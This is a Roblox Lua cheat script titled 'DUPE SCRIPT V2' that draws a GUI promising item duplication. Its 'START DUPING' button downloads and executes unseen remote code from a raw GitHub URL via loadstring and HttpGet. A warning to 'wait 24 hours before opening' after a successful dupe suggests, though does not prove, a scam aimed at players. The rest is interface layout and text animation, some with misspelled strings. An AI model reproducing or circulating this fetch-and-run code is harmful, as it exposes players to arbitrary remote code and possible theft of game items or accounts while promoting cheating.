-- By:HAROLD
-- Version: 2.0

-- Instances:

local DupeGui = Instance.new("ScreenGui")
local Frame = Instance.new("ImageLabel")
local Frame_2 = Instance.new("ImageLabel")
local Start = Instance.new("TextButton")
local TextLabel = Instance.new("TextLabel")
local UICorner = Instance.new("UICorner")
local TextLabel_2 = Instance.new("TextLabel")
local TextLabel_3 = Instance.new("TextLabel")

--Properties:

DupeGui.Name = "DupeGui"
DupeGui.Parent = game.CoreGui
DupeGui.ResetOnSpawn = false

Frame.Name = "Frame"
Frame.Parent = DupeGui
Frame.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
Frame.BackgroundTransparency = 1.000
Frame.Position = UDim2.new(0.356725186, 0, 0.391111106, 0)
Frame.Size = UDim2.new(0, 352, 0, 195)
Frame.Image = "rbxassetid://3570695787"
Frame.ImageColor3 = Color3.fromRGB(81, 81, 81)
Frame.ImageTransparency = 0.050
Frame.ScaleType = Enum.ScaleType.Slice
Frame.SliceCenter = Rect.new(100, 100, 100, 100)
Frame.SliceScale = 0.100
Frame.Active = true
Frame.Draggable = true

Frame_2.Name = "Frame"
Frame_2.Parent = Frame
Frame_2.BackgroundColor3 = Color3.fromRGB(0, 85, 255)
Frame_2.BackgroundTransparency = 1.000
Frame_2.BorderSizePixel = 0
Frame_2.Position = UDim2.new(0.237866595, 0, 0.606730282, 0)
Frame_2.Size = UDim2.new(0, 182, 0, 46)
Frame_2.Image = "rbxassetid://3570695787"
Frame_2.ImageColor3 = Color3.fromRGB(0, 85, 255)
Frame_2.ScaleType = Enum.ScaleType.Slice
Frame_2.SliceCenter = Rect.new(100, 100, 100, 100)
Frame_2.SliceScale = 0.050

Start.Name = "Start"
Start.Parent = Frame_2
Start.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
Start.BackgroundTransparency = 1.000
Start.Position = UDim2.new(0.0055052042, 0, -0.00373589993, 0)
Start.Size = UDim2.new(0, 182, 0, 46)
Start.Font = Enum.Font.LuckiestGuy
Start.LineHeight = 0.750
Start.Text = "START DUPING"
Start.TextColor3 = Color3.fromRGB(30, 207, 36)
Start.TextSize = 20.000

TextLabel.Parent = Frame
TextLabel.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
TextLabel.BackgroundTransparency = 0.850
TextLabel.BorderColor3 = Color3.fromRGB(0, 0, 255)
TextLabel.Size = UDim2.new(0, 352, 0, 43)
TextLabel.Font = Enum.Font.Garamond
TextLabel.Text = "DUPE SCRIPT V2"
TextLabel.TextColor3 = Color3.fromRGB(0, 85, 255)
TextLabel.TextSize = 40.000

UICorner.CornerRadius = UDim.new(0, 10)
UICorner.Parent = TextLabel

TextLabel_2.Parent = Frame
TextLabel_2.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
TextLabel_2.BackgroundTransparency = 1.000
TextLabel_2.BorderColor3 = Color3.fromRGB(0, 0, 255)
TextLabel_2.Position = UDim2.new(-0.0350909084, 0, 0.884511352, 0)
TextLabel_2.Size = UDim2.new(0, 376, 0, 25)
TextLabel_2.Font = Enum.Font.SourceSansBold
TextLabel_2.Text = "If the dupe is successful, wait 24 hours before opening"
TextLabel_2.TextColor3 = Color3.fromRGB(255, 0, 0)
TextLabel_2.TextSize = 15.000

TextLabel_3.Parent = Frame
TextLabel_3.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
TextLabel_3.BackgroundTransparency = 1.000
TextLabel_3.BorderColor3 = Color3.fromRGB(0, 0, 255)
TextLabel_3.Position = UDim2.new(0.00284090918, 0, 0.300646901, 0)
TextLabel_3.Size = UDim2.new(0, 351, 0, 53)
TextLabel_3.Font = Enum.Font.Fantasy
TextLabel_3.Text = "Press Me To Start Duping"
TextLabel_3.TextColor3 = Color3.fromRGB(51, 255, 92)
TextLabel_3.TextSize = 25.000

-- Scripts:

local function ELVIX_fake_script() -- DupeGui.Script 
	local script = Instance.new('Script', DupeGui)

	Start.MouseButton1Down:connect(function()
		loadstring(game:HttpGet("https://raw.githubusercontent.com/leylow213/duperofficial/main/duperofficial"))()
	end)
end
coroutine.wrap(ELVIX_fake_script)()
local function BTVZG_fake_script() -- TextLabel.Script 
	local script = Instance.new('Script', TextLabel)

	--text color change script by dizzywig2000
	wait()
	while true do 
	i = 0
	for n=1,0,-0.05 do 
	i = i + 0.05
	script.Parent.TextColor3 = Color3.new(i, 0, n)
	wait() 
	end  
	i = 0
	for n=1,0,-0.05 do 
	i = i + 0.05
	script.Parent.TextColor3 = Color3.new(n, i, 0)
	wait()
	end   
	i = 0
	for n=1,0,-0.05 do 
	i = i + 0.05
	script.Parent.TextColor3 = Color3.new(0, n, i)
	wait() 
	end 
	end 
end
coroutine.wrap(BTVZG_fake_script)()
local function UGBN_fake_script() -- TextLabel_3.Changing text 
	local script = Instance.new('Script', TextLabel_3)

	while true do
	script.Parent.Text = "P"
	wait(.5)
	script.Parent.Text = "Pr"
	wait(.5)
	script.Parent.Text = "Pre"
	wait(.5)
	script.Parent.Text = "Pres"
	wait(.5)
	script.Parent.Text = "Press"
	wait(.5)
	script.Parent.Text = "Press "
	wait(.5)
	script.Parent.Text = "Press M"
	wait(.5)
	script.Parent.Text = "Press Me"
	wait(.5)
	script.Parent.Text = "Press Me T"
	wait(.5)
	script.Parent.Text = "Press Me To"
	wait(.5)
	script.Parent.Text = "Press Me To S"
	wait(.5)
	script.Parent.Text = "Press Me To St"
	wait(.5)
	script.Parent.Text = "Press Me To Sta"
	wait(.5)
	script.Parent.Text = "Press Me To Star"
	wait(.5)
	script.Parent.Text = "Press Me To Start"
	wait(.5)
	script.Parent.Text = "Press Me To Start "
	wait(.5)
	script.Parent.Text = "Press Me To Start D"
	wait(.5)
	script.Parent.Text = "Press Me To Star Du"
	wait(.5)
	script.Parent.Text = "Press Me To Star Dup"
	wait(.5)
	script.Parent.Text = "Press Me To Start Dupi"
	wait(.5)
	script.Parent.Text = "Press Me To Star Dupin"
	wait(.5)
	script.Parent.Text = "Press Me To Star Duping"
	wait(.5)
	end 
end
coroutine.wrap(UGBN_fake_script)()
